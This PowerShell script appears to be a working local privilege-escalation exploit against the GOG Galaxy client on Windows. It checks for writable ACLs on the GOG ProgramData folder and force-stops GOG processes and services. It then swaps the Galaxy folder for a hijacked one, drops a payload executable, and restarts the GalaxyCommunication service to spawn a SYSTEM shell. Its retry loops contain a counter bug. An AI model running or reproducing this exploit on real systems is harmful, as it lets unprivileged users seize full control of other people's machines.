# inputs param ( [switch]$exploit ) $gogFolder = $Env:ProgramData + "\GOG.com\" $gogGalaxyFolder = $Env:ProgramData + "\GOG.com\Galaxy" $gogGalaxyFolder_new = $Env:ProgramData + "\GOG.com\Galaxy_orig" $username = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name function Invoke-CheckAccess($path) { $acl = get-acl $path $Access = $acl.Access $hasAccess = $false foreach ($AccessObject in $Access) { $User = $AccessObject.IdentityReference.value $Rights = $AccessObject.FileSystemRights $Control = $AccessObject.AccessControlType if ($Control -eq "Allow" -and $User -eq $username -and $Rights -match "FullControl") { $hasAccess = $true } } if ($hasAccess) { return $true } return $false } $gogFolderAccess = Invoke-CheckAccess($gogFolder) $gogGalaxyFolderAccess = Invoke-CheckAccess($gogGalaxyFolder) if ($gogFolderAccess -and $gogGalaxyFolderAccess) { Write-Output "[+] Permissions check successful! Target is vulnerable!`n" if (!$exploit) { Write-Output "use -exploit to get a system shell`n" exit } # check if GOG is running and try to kill it Write-Output "[+] try to close GalaxyClient..." $gog = Get-Process GalaxyClient -ErrorAction SilentlyContinue if ($gog) { # try gracefully first $null = $gog.CloseMainWindow() # kill after five seconds Start-Sleep 5 if (!$gog.HasExited) { $null = $gog | Stop-Process -Force } } Remove-Variable gog # check for gog services and shut them down Write-Output "[+] try to stop Galaxy services..." Stop-Service -Name "GalaxyClientService" -Force Stop-Service -Name "GalaxyCommunication" -Force # wait 5 seconds Start-Sleep 5 $renOk = $false $tries = 5 Do { try { Write-Output "[+] try to rename Galaxy folder..." $renItem = Rename-Item $gogGalaxyFolder $gogGalaxyFolder_new -Force -PassThru -ErrorAction 'Stop' if ($renItem) { $renOk = $true } } catch { Write-Output "[-] failed... try to kill all GOG processes" #check again for any active Gog Process and kill them Get-Process "GalaxyClient" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process "GalaxyClientService" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process "GalaxyClient Helper" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process "GOG Galaxy Notifications Renderer" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process "GalaxyCommunication" -ErrorAction SilentlyContinue | Stop-Process -Force if ($tries -eq 1) { Write-Output "[-] exploit failed" Write-Output $_ exit } $tries = - 1 Start-Sleep 5 } } While ($renOk -eq $false -or $tries -eq 0) if ($renOk -eq $true) { try { Write-Output "[+] successful, try to hijack folder structure..." $null = New-Item -Path $gogFolder -Name "Galaxy" -ItemType "directory" -ErrorAction 'Stop' Start-Sleep 1 $null = New-Item -Path $gogGalaxyFolder -Name "redists" -ItemType "directory" -ErrorAction 'Stop' Start-Sleep 1 $redists = $gogGalaxyFolder + "\redists\" Write-Output "[+] successful, placing payload..." Copy-Item ".\GalaxyCommunication.exe" -Destination $redists -ErrorAction 'Stop' Start-Sleep 1 Write-Output "[+] successful, spawning system shell..." } catch { Write-Output "[-] exploit failed" Write-Output $_ exit } # start GalaxService with payload try { Start-Service -Name "GalaxyCommunication" -ErrorAction SilentlyContinue } catch { Write-Output "" } # restore GOG Write-Output "`n[+] try to restore folder structure..." $restoreOk = $false $tries = 5 Do { try { Remove-Item $gogGalaxyFolder -Recurse -ErrorAction 'Stop' Rename-Item $gogGalaxyFolder_new $gogGalaxyFolder -ErrorAction 'Stop' $restoreOk = $true } catch { Start-Sleep 5 Write-Output "[-] restore failed, try it again" $tries = - 1 } } While ($restoreOk -eq $false -or $tries -eq 0) if ($restoreOk) { Write-Output "[+] successful, removed exploit and restored everything`n" } else { Write-Output "[-] restore failed you need to do it manually or reinstall GOG" } } else { Write-Output "[-] Exploit failed, cant rename $gogGalaxyFolder, make sure no other application has opened files in this folder (try a system reboot)" } } else { Write-Output "[-] Permission check faild, target does not seam to be vulnerable!" }